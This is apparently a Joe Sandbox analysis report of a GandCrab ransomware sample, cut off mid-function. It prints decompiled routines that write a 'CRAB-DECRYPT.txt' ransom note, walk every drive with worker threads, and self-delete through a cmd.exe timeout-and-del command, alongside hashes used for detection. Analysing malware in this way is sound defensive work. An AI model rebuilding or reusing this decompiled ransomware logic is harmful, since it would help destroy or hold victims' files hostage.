lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673E8
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673F6

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 938632407bc70def9149941d817badbade3ce127c2a6bbe5286cffb7b3c60710
Instruction ID: 2de2825cd944226985f45a912520117f934d1012e69d3e23bfacc420370a82f0
Opcode Fuzzy Hash: 938632407bc70def9149941d817badbade3ce127c2a6bbe5286cffb7b3c60710
Instruction Fuzzy Hash: 1741623254061AEFC7525FB9DE9C785B7A2FF047AAF084534E41292A21D736B478DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0FE65F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xfe72a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0FE69170( &_v267, 0, 0xff);
					E0FE65DC0( &_v268, _t31, lstrlenA(_t31));
					E0FE65E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0fe65f09
0x0fe65f1b
0x0fe65f1e
0x0fe65f20
0x0fe65f29
0x0fe65f2d
0x0fe65f38
0x0fe65f40
0x0fe65f49
0x0fe65f6c
0x0fe65f72
0x0fe65f75
0x0fe65f81
0x0fe65f8b
0x0fe65fa3
0x0fe65fb3
0x0fe65fc3
0x0fe65fc3
0x0fe65fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0FE65F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0FE65F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0FE65F49
lstrlenA.KERNEL32(00000000), ref: 0FE65F54
wsprintfA.USER32 ref: 0FE65F6C
_memset.LIBCMT ref: 0FE65F8B
lstrlenA.KERNEL32(00000000), ref: 0FE65F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65FC3

Strings

%Xeuropol, xrefs: 0FE65F66
RtlComputeCrc32, xrefs: 0FE65F43
ntdll.dll, xrefs: 0FE65F33

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 9cee5d2d24d2dca4260546e441231581fe4297ab90e89eb8a244b832401b49aa
Instruction ID: cb87fed37e7eee0e0d6ad8243101f21a1e5ef0b2198f99214217c2e8041d1035
Opcode Fuzzy Hash: 9cee5d2d24d2dca4260546e441231581fe4297ab90e89eb8a244b832401b49aa
Instruction Fuzzy Hash: A01122B1E8030CBBD7205B69AC49FAF7F78AB05B91F140079F904B2281EAB859508B55

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfe72a64; // 0xfe72000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfe72a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fe66d5b
0x0fe66d63
0x0fe66d85
0x0fe66d8a
0x0fe66d9e
0x0fe66da5
0x0fe66dbe
0x0fe66dbe
0x0fe66dc5
0x0fe66dcb
0x0fe66d8c
0x0fe66d99
0x0fe66d99
0x0fe66dd8
0x0fe66de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FE66E22,00000000,?,?), ref: 0FE66D55
wsprintfW.USER32 ref: 0FE66D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FE66D7F
GetLastError.KERNEL32(?,?), ref: 0FE66D8C
lstrlenW.KERNEL32(0FE72000,?,00000000,?,?), ref: 0FE66DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FE66DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0FE66DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0FE66D5D

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: e7ce7ccd8798363c1f4e6188f7cc5661097f36ce85c84bd4e81c8a038c42b5f6
Instruction ID: 48258db9185e2d594848f9103e3968a5cff7a7a59119ef2dab7dc4fd2ece7686
Opcode Fuzzy Hash: e7ce7ccd8798363c1f4e6188f7cc5661097f36ce85c84bd4e81c8a038c42b5f6
Instruction Fuzzy Hash: F00192757803087BF2201B66AD4AF6B375CEB46FA6F100135FB05B91C1DBA869248769

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE65350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fe65376
0x0fe6537a
0x0fe6537e
0x0fe65388
0x0fe65390
0x0fe65399
0x0fe653b3
0x0fe653b3
0x0fe65390
0x0fe653bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FE654E9,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000), ref: 0FE65366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65388
wsprintfW.USER32 ref: 0FE65399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FE653B3
ExitProcess.KERNEL32 ref: 0FE653BB

Strings

open, xrefs: 0FE653AC
/c timeout -c 5 & del "%s" /f /q, xrefs: 0FE65393
cmd.exe, xrefs: 0FE653A7

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 4fe93ed6d14534b5ca31fa8a6aa8dac9608fdad68d4fc35137723a5261f710b6
Instruction ID: d4a6d934b286cd271360a59bd9b88a0c2d2096f4053104e9048199713f6a8817
Opcode Fuzzy Hash: 4fe93ed6d14534b5ca31fa8a6aa8dac9608fdad68d4fc35137723a5261f710b6
Instruction Fuzzy Hash: E7F030B1BC235833F1311A661C1FF0B3D189B46FB6F241016F704BE1C295E4641087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE62C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfe6f290; // 0x21
				asm("movdqu xmm0, [0xfe6f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FE62AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0fe62c59
0x0fe62c5e
0x0fe62c66
0x0fe62c69
0x0fe62c70
0x0fe62c76
0x0fe62c79
0x0fe62ce9
0x0fe62cf2
0x0fe62d01
0x0fe62c7b
0x0fe62c7e
0x0fe62c9f
0x0fe62cbd
0x0fe62ccb
0x0fe62cd7
0x0fe62c80
0x0fe62c94
0x0fe62c94
0x0fe62c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FE62C8A
BeginPaint.USER32(?,?), ref: 0FE62C9F
lstrlenW.KERNEL32(?), ref: 0FE62CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FE62CBD
EndPaint.USER32(?,?), ref: 0FE62CCB
CreateThread.KERNEL32 ref: 0FE62CE9
DestroyWindow.USER32(?), ref: 0FE62CF2

Strings

GandCrab!, xrefs: 0FE62C5E

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 3880c87b391473f83b6f4919dfaadd85c52cc398c692b5ee79b81b6d80731d1c
Instruction ID: 5621d5ee1d882da4c9291ac971ac60bfa13147b78d7dcee6e84060a0619a22fd
Opcode Fuzzy Hash: 3880c87b391473f83b6f4919dfaadd85c52cc398c692b5ee79b81b6d80731d1c
Instruction Fuzzy Hash: E811B67254420DABD711DF54EC09FAB7B68FB49762F000626FE41E6190E7719520DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE63FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfe6f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FE66F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FE65670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0fe63ff6
0x0fe64008
0x0fe6400c
0x0fe64010
0x0fe6401b
0x0fe6401e
0x0fe64020
0x0fe64023
0x0fe64028
0x0fe6402c
0x0fe64031
0x0fe6403b
0x0fe6403f
0x0fe64046
0x0fe64050
0x0fe64054
0x0fe6405a
0x0fe64063
0x0fe64072
0x0fe64075
0x0fe64082
0x0fe64085
0x0fe6408b
0x0fe64092
0x0fe6409f
0x0fe640a3
0x0fe640a4
0x0fe640a4
0x0fe640a7
0x0fe640a8
0x0fe640b6
0x0fe640ba
0x0fe640bd
0x0fe640c7
0x0fe640cf
0x0fe640d5
0x0fe640db
0x0fe640e1
0x0fe640eb
0x0fe640f2
0x0fe640f6
0x0fe640fa
0x0fe640fc
0x0fe64104
0x0fe6410d
0x0fe6416c
0x0fe64170
0x0fe6410f
0x0fe6410f
0x0fe64112
0x0fe64118
0x0fe6411f
0x0fe64120
0x0fe64127
0x0fe6412b
0x0fe64130
0x0fe64137
0x0fe6413a
0x0fe6413e
0x0fe64148
0x0fe6414a
0x0fe6414e
0x0fe64151
0x0fe64154
0x0fe64154
0x0fe64154
0x0fe6415a
0x0fe6415e
0x0fe64162
0x0fe64166
0x0fe64166
0x0fe64176
0x0fe6419a
0x0fe64178
0x0fe64178
0x0fe64182
0x0fe64186
0x0fe6418d
0x0fe641a4
0x0fe641a8
0x0fe641c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FE64010
GetTickCount.KERNEL32 ref: 0FE64035
GetDriveTypeW.KERNEL32(?), ref: 0FE6405A
CreateThread.KERNEL32 ref: 0FE64099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FE640DB
GetTickCount.KERNEL32 ref: 0FE640E1

Strings

?:\, xrefs: 0FE64023

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: d5c93081bb0153708442f430ad4c742b94a55cc1ed19a6185afa7aa1e00b5ee0
Instruction ID: a5c5512a9c5225457e45cf8f12b95f0b81f1dde9136b118ce8bc057e4a173ada
Opcode Fuzzy Hash: d5c93081bb0153708442f430ad4c742b94a55cc1ed19a6185afa7aa1e00b5ee0
Instruction Fuzzy Hash: F95177709483049FC310CF18C884B5BBBE5FF89368F505A2EF989AB391D375A944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FE66DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fe66f59
0x0fe66f5f
0x0fe66f6e
0x0fe66f7c
0x0fe66f90
0x0fe66f98
0x0fe66fa0
0x0fe66fa8
0x0fe66fb6
0x0fe66fcb
0x0fe66fdb
0x0fe66fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FE66F59
wsprintfW.USER32 ref: 0FE66F6E
InitializeCriticalSection.KERNEL32(?), ref: 0FE66F7C
VirtualAlloc.KERNEL32 ref: 0FE66FB0

Part of subcall function 0FE66DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
Part of subcall function 0FE66DF0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
Part of subcall function 0FE66DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FE66FDB
ExitThread.KERNEL32 ref: 0FE66FE3

Strings

%c:\, xrefs: 0FE66F68

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 9eb3929d63d617b53883772fdda014fa6f60d87aedc774d80847f505d4d4bbce
Instruction ID: a1571011d64cc7d405b1c040b6e9c972aeea03a594302a02fe552314ee2a4091
Opcode Fuzzy Hash: 9eb3929d63d617b53883772fdda014fa6f60d87aedc774d80847f505d4d4bbce
Instruction Fuzzy Hash: F401D2B0544304BBE7109F11CC8AF1B3BB8EB45B71F004629FB64AE2C1D7B89514CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FE62890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FE63030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FE63030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FE63030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FE68400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FE62830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0fe62890
0x0fe62899
0x0fe6289b
0x0fe628b1
0x0fe628b6
0x0fe628f9
0x0fe62901
0x0fe628b8
0x0fe628c0
0x0fe628c3
0x0fe628ca
0x0fe628cf
0x0fe628d0
0x0fe628d8
0x0fe628e5
0x0fe628eb
0x0fe628f0
0x0fe62910
0x0fe62914
0x0fe62916
0x0fe6291d
0x0fe6291f
0x0fe62920
0x0fe62920
0x0fe62923
0x0fe62926
0x0fe6292b
0x0fe6292b
0x0fe6292e
0x0fe6293f
0x0fe62942
0x0fe62942
0x0fe62951
0x0fe62954
0x0fe6295e
0x0fe628f2
0x0fe628f3
0x00000000
0x0fe628f3
0x0fe628f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,747582B0,00000000,?,?,0FE62C02), ref: 0FE628AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FE62C02), ref: 0FE628BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FE62C02), ref: 0FE628E5
CloseHandle.KERNEL32(00000000,?,?,0FE62C02), ref: 0FE628F3
MapViewOfFile.KERNEL32(00000000,747582B1,00000000,00000000,00000000,?,?,0FE62C02), ref: 0FE6290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FE62C02), ref: 0FE62942
CloseHandle.KERNEL32(?,?,?,0FE62C02), ref: 0FE62951
CloseHandle.KERNEL32(00000000,?,?,0FE62C02), ref: 0FE62954

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 6aa62afe37e65dce2c0524c95e802c5302e6b667a33da4d36561c6cfc25818b8
Instruction ID: cd4b768cad4fd47f522eefe34a2b9393e2e9f5bb8233fe787783090936385b04
Opcode Fuzzy Hash: 6aa62afe37e65dce2c0524c95e802c5302e6b667a33da4d36561c6cfc25818b8
Instruction Fuzzy Hash: BC2134B1E4021D7FE7106B759C85F7FB76CDB46AEAF000235FD01A2280EA38AC1146A0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE669B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE669B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfe72a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
